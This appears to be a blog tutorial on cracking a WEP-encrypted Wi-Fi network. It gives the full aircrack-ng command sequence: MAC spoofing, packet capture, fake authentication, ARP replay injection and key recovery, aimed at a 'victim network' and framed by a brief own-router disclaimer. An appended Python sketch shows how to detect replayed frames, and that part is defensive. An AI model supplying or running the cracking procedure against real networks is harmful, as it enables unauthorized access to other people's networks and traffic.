How to hack a Wi-Fi network with WEP encryption
Tips Technologies / December 19, 2019
How is Wi-Fi hacked? Many of us have heard that when setting up a Wi-Fi access point you should never choose WEP encryption, because it is very easily cracked. Probably only a few have tried to do it themselves, and about as many know what it actually looks like. The following describes one way of breaking into an access point that uses this encryption protocol, so that you can understand more clearly how real the situation is when someone connects to your super-secret access point, and what such a break-in looks like in general. Of course, using this on someone else's router is not allowed under any circumstances. This material is for informational purposes only, and calls for the abandonment of easily cracked encryption protocols.
To crack the network, an attacker will need:
- a suitable Wi-Fi adapter that supports packet injection (for example, Alfa AWUS036H)
- a BackTrack Live CD
- your own Wi-Fi access point with WEP, on which the experiment will be carried out
- patience
After booting BackTrack, open its command line, called Konsole, and type the following command:
airmon-ng
You will see your network interface, which will be called «ra0» or something similar. Remember this name. From here on it is referred to as (interface); replace it with your interface's name. Next, type the following 4 lines in sequence:
airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)
The network interface now has a fake MAC address. Enter:
airodump-ng (interface)
A list of available wireless networks will start to appear. Once the list shows the desired network, press Ctrl + C to stop the search. Copy the network's BSSID and note its channel (the CH column). Also make sure that the ENC column shows WEP.
Now we start collecting data from this network:
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
Here channel is the channel from the CH column, file name is the name of the file to which everything will be written, and bssid is the network identifier.
You will see something similar to what is shown in the screenshot. Leave this window as it is. Open a new Konsole window and type:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
essid is the SSID (network name) of the victim network.
Wait for the message «Association successful» to appear.
Next, type:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
Now you need to be patient and wait until the number in the #Data column passes the 10,000 mark.
Once the required amount of data has been collected, open a third Konsole window and type:
aircrack-ng -b (bssid) (file name-01.cap)
For the file name, enter the name you chose for the file earlier.
If successful, you will see a «KEY FOUND» line, which contains the network key.
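From the defender's side, the re-injection step above is noisy: a replayed frame is retransmitted byte for byte, so one station sends hundreds of frames that all carry the same WEP IV and length. The following detection sketch is an added example, not part of the original article; the frame tuple layout, the thresholds and the sample data are assumptions constructed for illustration.

```python
from collections import Counter, defaultdict

# Constructed sample: (source MAC, WEP IV as hex, frame length in bytes).
# This tuple layout is an assumption of the example, not a capture-tool format.
SAMPLE_FRAMES = (
    [("00:11:22:33:44:55", "3a91c0", 68)] * 400                         # one frame replayed
    + [("66:77:88:99:aa:bb", f"{i:06x}", 68 + i % 900) for i in range(300)]  # normal client
)


def detect_replay(frames, min_frames=100, max_unique_ratio=0.05):
    """Return {source_mac: reason} for stations that appear to replay frames.

    A legitimate WEP sender uses a new IV for each frame, so its number of
    unique IVs is close to its number of frames. A replayed frame cannot be
    re-encrypted without the key, so its IV and length never change.
    """
    ivs = defaultdict(Counter)
    sizes = defaultdict(Counter)
    for src, iv, length in frames:
        ivs[src][iv] += 1
        sizes[src][length] += 1

    alerts = {}
    for src, counter in ivs.items():
        total = sum(counter.values())
        if total < min_frames:          # too little traffic to judge
            continue
        if len(counter) / total <= max_unique_ratio:
            top_iv, hits = counter.most_common(1)[0]
            top_len = sizes[src].most_common(1)[0][0]
            alerts[src] = f"IV {top_iv} seen {hits}x in {total} frames, length {top_len}"
    return alerts


if __name__ == "__main__":
    for mac, reason in detect_replay(SAMPLE_FRAMES).items():
        print(mac, reason)
```

An alert of this kind on a WEP network is a reason to move the access point to WPA2 or WPA3 rather than to block a single MAC address, since the source address is trivially changed.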